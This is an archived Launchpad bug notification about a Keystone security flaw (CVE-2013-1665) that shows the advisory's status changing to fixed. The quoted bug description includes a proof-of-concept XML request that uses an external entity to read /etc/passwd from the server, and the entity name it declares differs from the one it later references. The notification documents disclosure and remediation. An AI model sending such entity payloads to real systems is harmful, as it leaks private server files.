yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1100279] Re: [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Thierry Carrez <thierry.carrez+lp@xxxxxxxxx>
Date: Fri, 24 May 2013 12:55:25 -0000
Reply-to: Bug 1100279 <1100279@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

** Summary changed:

- Local file leak through entities in XML requests (CVE-2013-1665)
+ [OSSA 2013-004] Local file leak through entities in XML requests (CVE-2013-1665)

** Also affects: ossa
   Importance: Undecided
       Status: New

** Changed in: ossa
       Status: New => Fix Released

** Changed in: ossa
     Assignee: (unassigned) => Thierry Carrez (ttx)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1100279

Title:
  [OSSA 2013-004] Local file leak through entities in XML requests
  (CVE-2013-1665)

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Committed
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  Evil XML ! Jonathan Murray from NCC Group reported that you can leak
  local file contents using XML entities in Keystone requests:

  POST /v2.0//OS-KSDM/roles HTTP/1.1
  x-auth-token: d0e1a2d3b4e5e6f7
  content-type: application/xml

  <!DOCTYPE doc [ <!ENTITY eny SYSTEM "file:///etc/passwd"> ]>
  <role>
  <name>&ent;</name>
  </role>

  just returns the content of the local file in role.name.

  Looks like we should disable parsing entities altogether, they seem to
  be exploitable ion pretty awesome ways. I'm not sure only Keystone is
  affected by this.

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1100279/+subscriptions